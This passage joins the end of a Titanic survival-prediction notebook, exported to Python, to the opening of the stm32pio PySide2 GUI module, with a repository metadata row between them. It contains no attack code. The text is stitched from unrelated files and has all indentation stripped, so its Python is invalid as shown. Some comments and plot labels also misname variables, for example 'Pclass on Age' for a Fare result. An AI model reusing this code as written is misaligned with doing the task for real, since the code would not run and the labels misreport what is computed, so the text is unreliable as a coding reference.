print('ANOVA 1-way for the train set: ', train_esq_sm)
print('ANOVA 1-way for the test set: ', test_esq_sm)
# For the **train set**, the effect of `Pclass` on `Fare` is **high** (0.3019).
#
# For the **test set**, the effect of `Pclass` on `Fare` is **high** (0.3331).
#
# **Conclusion:** the effect of `Pclass` on `Age` differs for about **3%** between the two sets.
# #### Pclass vs Parch
# Let's first write a quick function to plot the proportion of `Pclass` by another discrete variable.
# In[ ]:
def plot_pclass_variable(dataset, variable):
"""
Plots the proportion of variable values per Pclass value of a dataset.
:param dataset: pandas DataFrame
:param variable: variable to plot
"""
first_variable_index = dataset.groupby(['Pclass', variable]).size()[1].index.values
second_variable_index = dataset.groupby(['Pclass', variable]).size()[2].index.values
third_variable_index = dataset.groupby(['Pclass', variable]).size()[3].index.values
index = list(set().union(first_variable_index, second_variable_index, third_variable_index))
raw_first_variable = dataset.groupby(['Pclass', variable]).size()[1]
raw_second_variable = dataset.groupby(['Pclass', variable]).size()[2]
raw_third_variable = dataset.groupby(['Pclass', variable]).size()[3]
first_variable = []
second_variable = []
third_variable = []
for i in range(max(index) + 1):
first_variable.append(raw_first_variable[i] if i in first_variable_index else 0)
second_variable.append(raw_second_variable[i] if i in second_variable_index else 0)
third_variable.append(raw_third_variable[i] if i in third_variable_index else 0)
percent_first_variable = [first_variable[i]/(first_variable[i] + second_variable[i] + third_variable[i]) if i in index else 0 for i in range(max(index) + 1)]
percent_second_variable = [second_variable[i]/(first_variable[i] + second_variable[i] + third_variable[i]) if i in index else 0 for i in range(max(index) + 1)]
percent_third_variable = [third_variable[i]/(first_variable[i] + second_variable[i] + third_variable[i]) if i in index else 0 for i in range(max(index) + 1)]
r = list(range(max(index) + 1))
fig, axs = plt.subplots(1,1,figsize=(18,4))
plt.bar(r, percent_first_variable, color='#264e86')
plt.bar(r, percent_second_variable, bottom=percent_first_variable, linewidth=0, color='#0074e4')
plt.bar(r, percent_third_variable, bottom=percent_second_variable, linewidth=0, color='#74dbef')
plt.xticks(r, r)
plt.title('Proportion of Pclass values by ' + variable)
axs.legend(labels=['1', '2', '3'])
axs.yaxis.set_major_formatter(PercentFormatter(xmax=1))
# Train set:
# In[ ]:
plot_pclass_variable(train_df, 'Parch')
chisq(train_df, 'Pclass', 'Parch')
# Test set:
# In[ ]:
plot_pclass_variable(test_df, 'Parch')
chisq(test_df, 'Pclass', 'Parch')
# We can witness very different distributions when `Parch` is equal to 3 between both sets.
#
# **Conclusion**: `Pclass` and `Parch` are considered **strongly dependent** both on the train set and test set.
# #### Pclass vs SibSp
# Train set:
# In[ ]:
plot_pclass_variable(train_df, 'SibSp')
chisq(train_df, 'Pclass', 'SibSp')
# Test set:
# In[ ]:
plot_pclass_variable(test_df, 'SibSp')
chisq(test_df, 'Pclass', 'SibSp')
# **Conclusion:** contrary to `Parch` which is strongly linearly correlated to `SibSp`, `Pclass` and `SibSp` **are not** considered dependent both on the train set and test set.
# ## Step 4: Preparing the data for consumption <a id="step4"></a>
# We will proceed with **outliers elimination** and **feature engineering**.
# ### 4.1 Outliers elimination
# Outliers are usually bad for model generalization, let's drop a 1% ratio with the **Isolation Forest** algorithm on `Age`, `Fare`, `Parch`, `SibSp`. For more details on the algorithm, feel free to read the original paper: https://cs.nju.edu.cn/zhouzh/zhouzh.files/publication/icdm08b.pdf.
# In[ ]:
X_train = train_df[['Age', 'Fare', 'Parch', 'SibSp']].copy(deep=True).dropna()
std_scaler = StandardScaler()
X_scaled = std_scaler.fit_transform(X_train)
clf = ensemble.IsolationForest(contamination=0.01)
clf.fit(X_scaled)
y_pred = clf.predict(X_scaled)
X_train['isOutlier'] = y_pred
outliers_list = X_train.index[X_train['isOutlier'] == -1].tolist()
data_df.drop(outliers_list, inplace=True)
train_df.drop(outliers_list, inplace=True)
TRAINING_LENGTH = len(train_df)
# #### Deleted outliers (1% ratio)
# In[ ]:
X_train[X_train['isOutlier'] == -1]
# ### 4.2. Feature engineering
# Let's now create and transform existing features to have stable distributions between both sets.
# ### Sex
# #### Mapping Sex
# The `Sex` feature can't be used as is, it has to be mapped to a boolean feature. Let's quickly map the values.
# In[ ]:
data_df['Sex'].replace(['male', 'female'], [0,1], inplace=True)
# ### Fare
# #### Guessing Fare
# We will see this below in greater detail but there is a missing value for `Fare`.
# Let's quickly fill this value with the median.
# In[ ]:
data_df['Fare'].fillna(data_df['Fare'].median(), inplace=True)
# #### Reducing Fare skewness
# In[ ]:
# Apply log to Fare to reduce skewness distribution
data_df["Fare"] = data_df["Fare"].map(lambda i: np.log(i) if i > 0 else 0)
fig, ax = plt.subplots(figsize=(16,4))
g = sns.distplot(data_df["Fare"], ax=ax, color='#25627D', label="Skewness : %.2f"%(data_df["Fare"].skew()))
g = g.legend(loc="best")
# #### Making Fare bins
# To help our model better generalize, it often helps to use bins rather than raw values. Let's make `Fare` bins.
# In[ ]:
data_df['FareBin'] = pd.qcut(data_df['Fare'], 6)
label = LabelEncoder()
data_df['FareBin_Code'] = label.fit_transform(data_df['FareBin'])
data_df.drop(['Fare'], 1, inplace=True)
data_df.drop(['FareBin'], 1, inplace=True)
# Let's see if we reduced the divergence between both sets.
# In[ ]:
train_df = data_df[:TRAINING_LENGTH]
test_df = data_df[TRAINING_LENGTH:]
logfare_jsd = JSD(train_df['FareBin_Code'].dropna().values, test_df['FareBin_Code'].dropna().values)
print('Jensen-Shannon divergence of Fare:', np.mean(logfare_jsd))
print('Standard deviation:', np.std(logfare_jsd))
# In[ ]:
fig, ax = plt.subplots(figsize=(16,4))
jsd = pd.DataFrame(np.column_stack([fare_jsd, logfare_jsd]), columns=['Fare', 'LogFare'])
sns.boxplot(data=jsd, ax=ax, orient="h", linewidth=1, saturation=5, palette=palette2)
ax.set_title('Jensen-Shannon divergences of Fare and LogFare')
# Great, we **reduced the divergence** between the train set and the test set a bit, making it a more consistent feature.
# ### Ticket
# #### Extracting the prefix
# Ticket's numbers may have a prefix that could be an indicator of the booking process (tied to wealth) and/or location on the boat. Let's extract it.
# In[ ]:
Ticket = []
for i in data_df['Ticket'].values:
if not i.isdigit() :
Ticket.append(i.replace('.', '').replace('', '').strip().split()[0])
else:
Ticket.append('X')
data_df['Ticket'] = Ticket
# #### Getting Ticket dummy variables
# In[ ]:
data_df = pd.get_dummies(data_df, columns=['Ticket'], drop_first=True)
# ### Title
# #### Creating Title
# A feature that often helps categorize in this problem is `Title` derived from `Name`.
# In[ ]:
# Get Title from Name
titles = [i.split(',')[1].split('.')[0].strip() for i in data_df['Name']]
data_df['Title'] = pd.Series(titles, index=data_df.index)
rare_titles = pd.Series(titles).value_counts()
rare_titles = rare_titles[rare_titles < 10].index
data_df['Title'] = data_df['Title'].replace(rare_titles, 'Rare')
data_df['Title'] = data_df['Title'].map({'Mr': 0, 'Miss': 1, 'Mrs': 2, 'Master': 3, 'Rare': 4})
data_df['Title'] = data_df['Title'].astype(int)
# #### Getting Title dummy variables
# Great, the feature shows some discrimination. It is not ordinal though, lets create dummy variables out of it. (we only need `k-1` columns)
# In[ ]:
data_df = pd.get_dummies(data_df, columns=['Title'], drop_first=True)
# ### Family_Size
# #### Creating Family_Size
# Finally we are combining `Parch` and `SibSp`: `Family_Size = Parch + SibSp + 1`.
# In[ ]:
data_df['Family_Size'] = data_df['Parch'] + data_df['SibSp'] + 1
# In[ ]:
tmp_train_df = data_df[:TRAINING_LENGTH].copy(deep=True)
tmp_test_df = data_df[TRAINING_LENGTH:].copy(deep=True)
fs_jsd = JSD(tmp_train_df['Family_Size'].dropna().values, tmp_test_df['Family_Size'].dropna().values)
print('Jensen-Shannon divergence of Family_Size:', np.mean(fs_jsd))
print('Standard deviation:', np.std(fs_jsd))
# In[ ]:
fig, ax = plt.subplots(figsize=(16,4))
jsd = pd.DataFrame(np.column_stack([parch_jsd, sibsp_jsd, fs_jsd]), columns=['Fare', 'FareBin', 'Family_Size'])
sns.boxplot(data=jsd, ax=ax, orient="h", linewidth=1, saturation=5, palette=palette3)
ax.set_title('Jensen-Shannon divergences of Parch, SibSp and Family_Size')
# Great, we **reduced the divergence** between the train set and the test set a bit, making it a more consistent feature. We didn't lose much information as we are adding two linearly correlated features.
# ### Missing values
# Let's first have a quick look at missing values in the datasets:
# In[ ]:
print('Train dataset:')
train_df.isnull().sum().to_frame('Missing values').transpose()
# In[ ]:
print('Test/Validation dataset:')
test_df.isnull().sum().to_frame('Missing values').transpose()
# #### Dropping Name, Parch, SibSp
# Let's drop those features:
# * `Name`: was used to create the `Title` feature
# * `Parch`: was used to create the `Family_Size` feature
# * `SibSp`: was used to create the `Family_Size` feature
# In[ ]:
data_df.drop(['Name', 'Parch', 'SibSp'], axis = 1, inplace = True)
# ### Embarked
# #### Filling Embarked
# For 2 missing values, let's fill `Embarked` with the most frequent value.
# In[ ]:
data_df['Embarked'].fillna(data_df['Embarked'].mode()[0], inplace=True)
# #### Getting Embarked dummy variables
# In[ ]:
data_df = pd.get_dummies(data_df, columns=['Embarked'], drop_first=True)
# ### Deck
# #### Creating Deck
# There are a lot of missing values for the `Cabin` feature. This can be explained as some passengers didn't even have a cabin. Let's fill `NaN` values with `X` and extract the deck (letter) as it could indicate the location of the passenger's cabin on the boat.
# In[ ]:
data_df['Cabin'] = pd.Series([i[0] if not pd.isnull(i) else 'X' for i in data_df['Cabin'] ])
# In[ ]:
palette9 = ["#F8C7AA", "#F19B9C", "#EA708E", "#D54D88", "#A73B8F", "#7A2995", "#5B1F84", "#451764", "#300F45"]
g = sns.catplot(x='Cabin', y='Survived',saturation=5, aspect=2.5, data=data_df, kind='bar', order=['A','B','C','D','E','F','G','T','X'], palette=palette9)
# #### Getting Deck dummy variables
# In[ ]:
data_df = pd.get_dummies(data_df, columns=['Cabin'], prefix='Deck', drop_first=True)
# ### Age
# #### Guessing the Age
# The `Age` feature has quite a lot of missing values but it is still manageable. It can easily be completed with the median value (remember, not the mean) but we will rather predict those values with a **MICE imputer** so that it better fits the distributions of the other features.
#
# **Side note:** for some reason it appears that the MICE imputer was removed from `sklearn 0.20`, weird.
# In[ ]:
tmp_data_df = data_df.copy(deep = True)[['Age']]
imp = SimpleImputer(missing_values=np.nan, strategy='median')
tmp_data_df = pd.DataFrame(data=imp.fit_transform(tmp_data_df),index=tmp_data_df.index.values,columns=tmp_data_df.columns.values)
# #### Making Age bins
# In[ ]:
tmp_data_df['AgeBin'] = pd.qcut(tmp_data_df['Age'], 5, duplicates='drop')
tmp_data_df['AgeBin'].replace(np.NaN, -1, inplace = True)
label = LabelEncoder()
tmp_data_df['AgeBin_Code'] = label.fit_transform(tmp_data_df['AgeBin'])
tmp_data_df.drop(['Age', 'AgeBin'], axis=1, inplace=True)
data_df['AgeBin_Code'] = tmp_data_df['AgeBin_Code']
data_df.drop(['Age'], 1, inplace=True)
# Let's then compare the 3 most important features.
# In[ ]:
# Histogram comparison of Sex, Pclass, and Age by Survival
h = sns.FacetGrid(data_df, row='Sex', col='Pclass', hue='Survived')
h.map(plt.hist, 'AgeBin_Code', alpha=.75)
h.add_legend()
# ### A glance at our dataset
# In[ ]:
train_df = data_df[:TRAINING_LENGTH]
train_df.Survived = train_df.Survived.astype(int)
test_df = data_df[TRAINING_LENGTH:]
# In[ ]:
train_df.sample(5)
# ### 4.2. Data formatting
#
# Let's create our `X` and `y` and scale them.
# In[ ]:
X = train_df.drop('Survived', 1)
y = train_df['Survived']
X_test = test_df.copy().drop(columns=['Survived'], axis=1)
# In[ ]:
std_scaler = StandardScaler()
X = std_scaler.fit_transform(X)
X_test = std_scaler.transform(X_test)
# ## Step 5: Modeling the data <a id="step5"></a>
# ### 5.1. Model performance with Cross-Validation (CV)
# Let's quickly compare several classification algorithms with default parameters from `scikit-learn`, `xgboost`, `lightgbm` and `catboost` through cross-validation.
# In[ ]:
class CatBoostClassifierCorrected(CatBoostClassifier):
def fit(self, X, y=None, cat_features=None, sample_weight=None, baseline=None, use_best_model=None,
eval_set=None, verbose=None, logging_level=None, plot=False, column_description=None, verbose_eval=None,
metric_period=None, silent=None, early_stopping_rounds=None, save_snapshot=None, snapshot_file=None, snapshot_interval=None):
# Handle different types of label
self.le_ = LabelEncoder().fit(y)
transformed_y = self.le_.transform(y)
self._fit(X=X, y=transformed_y, cat_features=cat_features, pairs=None, sample_weight=sample_weight, group_id=None,
group_weight=None, subgroup_id=None, pairs_weight=None, baseline=baseline, use_best_model=use_best_model,
eval_set=eval_set, verbose=verbose, logging_level=logging_level, plot=plot, column_description=column_description,
verbose_eval=verbose_eval, metric_period=metric_period, silent=silent, early_stopping_rounds=early_stopping_rounds,
save_snapshot=save_snapshot, snapshot_file=snapshot_file, snapshot_interval=None)
return self
def predict(self, data, prediction_type='Class', ntree_start=0, ntree_end=0, thread_count=1, verbose=None):
predictions = self._predict(data, prediction_type, ntree_start, ntree_end, thread_count, verbose)
# Return same type as input
return self.le_.inverse_transform(predictions.astype(np.int64))
# In[ ]:
# Machine Learning Algorithm (MLA) Selection and Initialization
MLA = [
# Ensemble Methods
ensemble.RandomForestClassifier(),
# Nearest Neighbors
neighbors.KNeighborsClassifier(),
# XGBoost
XGBClassifier(),
# LightGBM
lgb.LGBMClassifier(),
# CatBoost
CatBoostClassifierCorrected(iterations=100, logging_level='Silent')
]
# Split dataset in cross-validation with this splitter class
cv_split = model_selection.ShuffleSplit(n_splits = 10, test_size = .3, train_size = .6, random_state = 0)
# Create table to compare MLA metrics
MLA_columns = ['MLA Name', 'MLA Parameters','MLA Train Accuracy Mean', 'MLA Test Accuracy Mean', 'MLA Test Accuracy 3*STD' ,'MLA Time']
MLA_compare = pd.DataFrame(columns = MLA_columns)
# Create table to compare MLA predictions
MLA_predict = pd.Series()
# Index through MLA and save performance to table
row_index = 0
for alg in MLA:
# Set name and parameters
MLA_name = alg.__class__.__name__
MLA_compare.loc[row_index, 'MLA Name'] = MLA_name
MLA_compare.loc[row_index, 'MLA Parameters'] = str(alg.get_params())
# Score model with cross validation
cv_results = model_selection.cross_validate(alg, X, y, cv = cv_split)
MLA_compare.loc[row_index, 'MLA Time'] = cv_results['fit_time'].mean()
MLA_compare.loc[row_index, 'MLA Train Accuracy Mean'] = cv_results['train_score'].mean()
MLA_compare.loc[row_index, 'MLA Test Accuracy Mean'] = cv_results['test_score'].mean()
# If this is a non-bias random sample, then +/-3 standard deviations (std) from the mean, should statistically capture 99.7% of the subsets
MLA_compare.loc[row_index, 'MLA Test Accuracy 3*STD'] = cv_results['test_score'].std()*3 #let's know the worst that can happen!
# Save MLA predictions - see section 6 for usage
alg.fit(X, y)
MLA_predict[MLA_name] = alg.predict(X)
row_index+=1
# Print and sort table
MLA_compare.sort_values(by = ['MLA Test Accuracy Mean'], ascending = False, inplace = True)
MLA_compare
# In[ ]:
fig, ax = plt.subplots(figsize=(16,6))
# Barplot
sns.barplot(x='MLA Test Accuracy Mean', y='MLA Name', ax=ax, data=MLA_compare, palette=sns.color_palette("coolwarm_r", 5))
# Prettify
plt.title('Machine Learning Algorithm Accuracy Score')
plt.xlabel('Accuracy Score (%)')
plt.ylabel('Algorithm')
# So as we can see, the first models are pretty similar in terms of **accuracy**.
# ### 5.2. Tune the model with ensemble methods
#
# Let's try to leverage ensemble methods to maximize accuracy on the test set.
#
# Let's try two ensemble methods:
# * **hard voting**: classification is the most frequent answer
# * **soft voting**: classification is based on the argmax of the sums of the predicted probabilities
# In[ ]:
# Removed models w/o attribute 'predict_proba' required for vote classifier and models with a 1.0 correlation to another model
vote_est = [
# Ensemble Methods:
('rfc', ensemble.RandomForestClassifier()),
# Nearest Neighbors:
('knn', neighbors.KNeighborsClassifier()),
# XGBoost:
('xgb', XGBClassifier()),
# LightGBM:
('lgb', lgb.LGBMClassifier()),
# CatBoost:
('cat', CatBoostClassifierCorrected(iterations=100, logging_level='Silent'))
]
# Hard vote or majority rules
vote_hard = ensemble.VotingClassifier(estimators = vote_est, voting = 'hard')
vote_hard_cv = model_selection.cross_validate(vote_hard, X, y, cv = cv_split)
vote_hard.fit(X, y)
print("Hard Voting Training w/bin score mean: {:.2f}". format(vote_hard_cv['train_score'].mean()*100))
print("Hard Voting Test w/bin score mean: {:.2f}". format(vote_hard_cv['test_score'].mean()*100))
print("Hard Voting Test w/bin score 3*std: +/- {:.2f}". format(vote_hard_cv['test_score'].std()*100*3))
print('-'*15)
# Soft vote or weighted probabilities
vote_soft = ensemble.VotingClassifier(estimators = vote_est , voting = 'soft')
vote_soft_cv = model_selection.cross_validate(vote_soft, X, y, cv = cv_split)
vote_soft.fit(X, y)
print("Soft Voting Training w/bin score mean: {:.2f}". format(vote_soft_cv['train_score'].mean()*100))
print("Soft Voting Test w/bin score mean: {:.2f}". format(vote_soft_cv['test_score'].mean()*100))
print("Soft Voting Test w/bin score 3*std: +/- {:.2f}". format(vote_soft_cv['test_score'].std()*100*3))
print('-'*15)
# Ok so good results, but there is room for improvement. The reason is we didn't touch any of the hyperparameters of the voting models.
#
# Let's perform grid search on the different classifiers. **(careful, this will take A LOT OF time)**
#
# (everything is set though)
# In[ ]:
# Hyper-parameter tuning with GridSearchCV:
grid_param = [
[{
# RandomForestClassifier
'criterion': ['gini'], #['gini', 'entropy'],
'max_depth': [8], #[2, 4, 6, 8, 10, None],
'n_estimators': [100], #[10, 50, 100, 300],
'oob_score': [False] #[True, False]
}],
[{
# KNeighborsClassifier
'algorithm': ['auto'], #['auto', 'ball_tree', 'kd_tree', 'brute'],
'n_neighbors': [7], #[1,2,3,4,5,6,7],
'weights': ['distance'] #['uniform', 'distance']
}],
[{
# XGBClassifier
'learning_rate': [0.05], #[0.05, 0.1,0.16],
'max_depth': [10], #[10,30,50],
'min_child_weight' : [6], #[1,3,6]
'n_estimators': [200]
}],
[{
# LightGBMClassifier
'learning_rate': [0.01], #[0.01,0.05,0.1],
'n_estimators': [200],
'num_leaves': [300], #[300,900,1200],
'max_depth': [25], #[25,50,75],
}],
[{
# CatBoostClassifier
'depth': [4],
'learning_rate' : [0.03],
'l2_leaf_reg': [4],
'iterations': [300],
'thread_count': [4]
}]
]
start_total = time.perf_counter()
for clf, param in zip (vote_est, grid_param):
start = time.perf_counter()
best_search = model_selection.GridSearchCV(estimator = clf[1], param_grid = param, cv = cv_split, scoring = 'roc_auc')
best_search.fit(X, y)
run = time.perf_counter() - start
best_param = best_search.best_params_
print('The best parameter for {} is {} with a runtime of {:.2f} seconds.'.format(clf[1].__class__.__name__, best_param, run))
clf[1].set_params(**best_param)
run_total = time.perf_counter() - start_total
print('Total optimization time was {:.2f} minutes.'.format(run_total/60))
print('-'*15)
# In[ ]:
# Hard vote or majority rules w/Tuned Hyperparameters
grid_hard = ensemble.VotingClassifier(estimators = vote_est , voting = 'hard')
grid_hard_cv = model_selection.cross_validate(grid_hard, X, y, cv = cv_split)
grid_hard.fit(X, y)
print("Hard Voting w/Tuned Hyperparameters Training w/bin score mean: {:.2f}". format(grid_hard_cv['train_score'].mean()*100))
print("Hard Voting w/Tuned Hyperparameters Test w/bin score mean: {:.2f}". format(grid_hard_cv['test_score'].mean()*100))
print("Hard Voting w/Tuned Hyperparameters Test w/bin score 3*std: +/- {:.2f}". format(grid_hard_cv['test_score'].std()*100*3))
print('-'*15)
# Soft vote or weighted probabilities w/Tuned Hyperparameters
grid_soft = ensemble.VotingClassifier(estimators = vote_est , voting = 'soft')
grid_soft_cv = model_selection.cross_validate(grid_soft, X, y, cv = cv_split)
grid_soft.fit(X, y)
print("Soft Voting w/Tuned Hyperparameters Training w/bin score mean: {:.2f}". format(grid_soft_cv['train_score'].mean()*100))
print("Soft Voting w/Tuned Hyperparameters Test w/bin score mean: {:.2f}". format(grid_soft_cv['test_score'].mean()*100))
print("Soft Voting w/Tuned Hyperparameters Test w/bin score 3*std: +/- {:.2f}". format(grid_soft_cv['test_score'].std()*100*3))
print('-'*15)
# ### 5.2. Submission
# Good scores overall, let's prepare the data for submission.
# In[ ]:
test_df['Survived'] = grid_soft.predict(X_test)
test_df['Survived'] = test_df['Survived'].astype(int)
print('Validation Data Distribution: \n', test_df['Survived'].value_counts(normalize = True))
submit = test_df[['Survived']]
#submit.to_csv("../output/submission.csv", index=True)
# Wait a minute, **0.79904** accuracy after submission? (still top 14% though)
# ## Step 6: Drawing conclusions <a id="step6"></a>
# It appears that our models capture some distributions from the engineered training dataset that differ slightly in the testing dataset: this is a sign of **overfitting**.
#
# We did use a lot of features from our datasets and generally, if you want to avoid overfitting, **less is better**. Remember the mapping of $X$ to a different feature space? We discovered through EDA that **the train set and the test set are not equally distributed**. We need a mapping that simplifies the distributions of features that have an influence on survival. And that's why this problem is hard.
#
# ### 6.1. Simplifying our datasets
#
# #### Dropping Deck, Embarked and Ticket
# Let's drop the most ambiguous features.
# In[ ]:
columns = [c for c in data_df.columns if 'Deck' in c or 'Embarked' in c or 'Ticket' in c]
simple_data_df = data_df.copy(deep=True)
simple_data_df.drop(columns=columns, axis=1, inplace=True)
# #### Simplifying Age
# Let's create the `Young`boolean feature telling us if the passenger is young (< 2nd bin).
# In[ ]:
simple_data_df['Young'] = np.where((simple_data_df['AgeBin_Code']<2), 1, 0)
simple_data_df.drop(columns=['AgeBin_Code'], axis=1, inplace=True)
# #### Merging Pclass and Sex
# Let's merge `Pclass` and `Sex`.
# In[ ]:
simple_data_df['P1_Male'] = np.where((simple_data_df['Sex']==0) & (simple_data_df['Pclass']==1), 1, 0)
simple_data_df['P2_Male'] = np.where((simple_data_df['Sex']==0) & (simple_data_df['Pclass']==2), 1, 0)
simple_data_df['P3_Male'] = np.where((simple_data_df['Sex']==0) & (simple_data_df['Pclass']==3), 1, 0)
simple_data_df['P1_Female'] = np.where((simple_data_df['Sex']==1) & (simple_data_df['Pclass']==1), 1, 0)
simple_data_df['P2_Female'] = np.where((simple_data_df['Sex']==1) & (simple_data_df['Pclass']==2), 1, 0)
simple_data_df['P3_Female'] = np.where((simple_data_df['Sex']==1) & (simple_data_df['Pclass']==3), 1, 0)
simple_data_df.drop(columns=['Pclass', 'Sex'], axis=1, inplace=True)
# In[ ]:
simple_train_df = simple_data_df[:TRAINING_LENGTH]
simple_test_df = simple_data_df[TRAINING_LENGTH:]
simple_data_df.sample(5)
# ### 6.2. Data formatting
# Let's create our `X` and `y` and scale them.
# In[ ]:
X = simple_train_df.drop('Survived', 1)
y = simple_train_df['Survived']
X_test = simple_test_df.copy().drop(columns=['Survived'], axis=1)
std_scaler = StandardScaler()
X = std_scaler.fit_transform(X)
X_test = std_scaler.transform(X_test)
# ### 6.3. Hyper-parameter tuning and ensemble methods
# Let's try to leverage ensemble methods to maximize accuracy on the test set.
# In[ ]:
# Hyper-parameter tuning with GridSearchCV:
grid_param = [
[{
# RandomForestClassifier
'criterion': ['gini'], #['gini', 'entropy'],
'max_depth': [8], #[2, 4, 6, 8, 10, None],
'n_estimators': [100], #[10, 50, 100, 300],
'oob_score': [False] #[True, False]
}],
[{
# KNeighborsClassifier
'algorithm': ['auto'], #['auto', 'ball_tree', 'kd_tree', 'brute'],
'n_neighbors': [7], #[1,2,3,4,5,6,7],
'weights': ['distance'] #['uniform', 'distance']
}],
[{
# XGBClassifier
'learning_rate': [0.05], #[0.05, 0.1,0.16],
'max_depth': [10], #[10,30,50],
'min_child_weight' : [6], #[1,3,6]
'n_estimators': [200]
}],
[{
# LightGBMClassifier
'learning_rate': [0.01], #[0.01,0.05,0.1],
'n_estimators': [200],
'num_leaves': [300], #[300,900,1200],
'max_depth': [25], #[25,50,75],
}],
[{
# CatBoostClassifier
'depth': [4],
'learning_rate' : [0.03],
'l2_leaf_reg': [4],
'iterations': [300],
'thread_count': [4]
}]
]
start_total = time.perf_counter()
for clf, param in zip (vote_est, grid_param):
start = time.perf_counter()
best_search = model_selection.GridSearchCV(estimator = clf[1], param_grid = param, cv = cv_split, scoring = 'roc_auc')
best_search.fit(X, y)
run = time.perf_counter() - start
best_param = best_search.best_params_
print('The best parameter for {} is {} with a runtime of {:.2f} seconds.'.format(clf[1].__class__.__name__, best_param, run))
clf[1].set_params(**best_param)
run_total = time.perf_counter() - start_total
print('Total optimization time was {:.2f} minutes.'.format(run_total/60))
print('-'*15)
# In[ ]:
# Hard vote or majority rules w/Tuned Hyperparameters
grid_hard = ensemble.VotingClassifier(estimators = vote_est , voting = 'hard')
grid_hard_cv = model_selection.cross_validate(grid_hard, X, y, cv = cv_split)
grid_hard.fit(X, y)
print("Hard Voting w/Tuned Hyperparameters Training w/bin score mean: {:.2f}". format(grid_hard_cv['train_score'].mean()*100))
print("Hard Voting w/Tuned Hyperparameters Test w/bin score mean: {:.2f}". format(grid_hard_cv['test_score'].mean()*100))
print("Hard Voting w/Tuned Hyperparameters Test w/bin score 3*std: +/- {:.2f}". format(grid_hard_cv['test_score'].std()*100*3))
print('-'*15)
# Soft vote or weighted probabilities w/Tuned Hyperparameters
grid_soft = ensemble.VotingClassifier(estimators = vote_est , voting = 'soft')
grid_soft_cv = model_selection.cross_validate(grid_soft, X, y, cv = cv_split)
grid_soft.fit(X, y)
print("Soft Voting w/Tuned Hyperparameters Training w/bin score mean: {:.2f}". format(grid_soft_cv['train_score'].mean()*100))
print("Soft Voting w/Tuned Hyperparameters Test w/bin score mean: {:.2f}". format(grid_soft_cv['test_score'].mean()*100))
print("Soft Voting w/Tuned Hyperparameters Test w/bin score 3*std: +/- {:.2f}". format(grid_soft_cv['test_score'].std()*100*3))
print('-'*15)
# ### 6.4. Submission
# Ok, let's prepare the data for submission.
# In[ ]:
simple_test_df['Survived'] = grid_soft.predict(X_test)
simple_test_df['Survived'] = test_df['Survived'].astype(int)
print('Validation Data Distribution: \n', simple_test_df['Survived'].value_counts(normalize = True))
submit = simple_test_df[['Survived']]
#submit.to_csv("../output/submission.csv", index=True)
# ## Changelog
# v1: initial submission.
# *This is a work in progress. Comments and critical feedback are always welcome.*
| [
"[email protected]"
] | |
7a9afdf64f2cd4a6b567ec1cf52e36b3070f9b44 | 22be59b7203b4efbfdfce10b08be232f45864973 | /stm32pio/gui/app.py | 02383b2a6b40b3ba927e17d8cf539c832ac61255 | [] | no_license | OS-Q/S48 | 1507d5ad40e27ced354f617eb389a3005e9f3c91 | 8819cf772e7f090c407f48789793952d59a13a16 | refs/heads/master | 2023-02-03T16:43:14.181130 | 2020-12-25T12:32:03 | 2020-12-25T12:32:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 37,637 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import collections
import inspect
import logging
import pathlib
import platform
import sys
import threading
import time
import weakref
from typing import List, Callable, Optional, Any, Mapping, MutableMapping, Iterator, Union
try:
from PySide2.QtCore import QUrl, Property, QAbstractListModel, QModelIndex, QObject, Qt, Slot, Signal, QThread,\
qInstallMessageHandler, QtInfoMsg, QtWarningMsg, QtCriticalMsg, QtFatalMsg, QThreadPool, QRunnable,\
QStringListModel, QSettings
if platform.system() == 'Linux':
# Most UNIX systems does not provide QtDialogs implementation so the program should be 'linked' against
# the QApplication...
from PySide2.QtWidgets import QApplication
QApplicationClass = QApplication
else:
from PySide2.QtGui import QGuiApplication
QApplicationClass = QGuiApplication
from PySide2.QtGui import QIcon
from PySide2.QtQml import qmlRegisterType, QQmlApplicationEngine, QJSValue
except ImportError as e:
print(e)
print("\nGUI version requires PySide2 to be installed. You can re-install stm32pio as 'pip install stm32pio[GUI]' "
"or manually install its dependencies by yourself")
sys.exit(-1)
MODULE_PATH = pathlib.Path(__file__).parent # module path, e.g. stm32pio-repo/stm32pio_gui/
ROOT_PATH = MODULE_PATH.parent.parent # repo's or the site-package's entry root
try:
import stm32pio.core.settings
import stm32pio.core.lib
import stm32pio.core.util
import stm32pio.cli.app
except ModuleNotFoundError:
sys.path.insert(0, str(ROOT_PATH))
import stm32pio.core.settings
import stm32pio.core.lib
import stm32pio.core.util
import stm32pio.cli.app
ProjectID = type(id(object))
class BuffersDispatchingHandler(logging.Handler):
"""
Every user's project using its own buffer (collections.deque) to store logs. This simple logging.Handler subclass
finds and puts an incoming record into the corresponding buffer
"""
buffers: MutableMapping[ProjectID, collections.deque] = {} # the dictionary of projects' ids and theirs buffers
def emit(self, record: logging.LogRecord) -> None:
if hasattr(record, 'project_id'):
# As we exist in the asynchronous environment there is always a risk of some "desynchronization" when the
# project (and its buffer) has already been gone but some late message has arrived. Hence, we need to check
buffer = self.buffers.get(record.project_id)
if buffer is not None:
buffer.append(record)
else:
module_logger.warning(f"Logging buffer for the project id {record.project_id} not found. The message "
f"was:\n{record.msg}")
else:
module_logger.warning("LogRecord doesn't have a project_id attribute. Perhaps this is a result of the "
f"logging setup misconfiguration. Anyway, the message was:\n{record.msg}")
class LoggingWorker(QObject):
"""
QObject living in a separate QThread, logging everything it receiving. Intended to be an attached
ProjectListItem property. Stringifies log records using global BuffersDispatchingHandler instance (its
stm32pio.core.util.DispatchingFormatter, to be precise) and passes them via Qt Signal interface so they can be
conveniently received by any Qt entity. Also, the level of the message is attaching so the reader can
interpret them differently.
Can be controlled by two threading.Event's:
stopped - on activation, leads to thread termination
can_flush_log - use this to temporarily save the logs in an internal buffer while waiting for some event to
occurs (for example GUI widgets to load), and then flush them when the time has come
"""
sendLog = Signal(str, int)
def __init__(self, project_id: ProjectID, parent: QObject = None):
super().__init__(parent=parent)
self.project_id = project_id
self.buffer = collections.deque()
projects_logger_handler.buffers[project_id] = self.buffer # register our buffer
self.stopped = threading.Event()
self.can_flush_log = threading.Event()
self.thread = QThread(parent=self)
self.moveToThread(self.thread)
self.thread.started.connect(self.routine)
self.thread.start()
def routine(self) -> None:
"""
The worker constantly querying the buffer on the new log messages availability
"""
while not self.stopped.wait(timeout=0.050):
if self.can_flush_log.is_set() and len(self.buffer):
record = self.buffer.popleft()
self.sendLog.emit(projects_logger_handler.format(record), record.levelno)
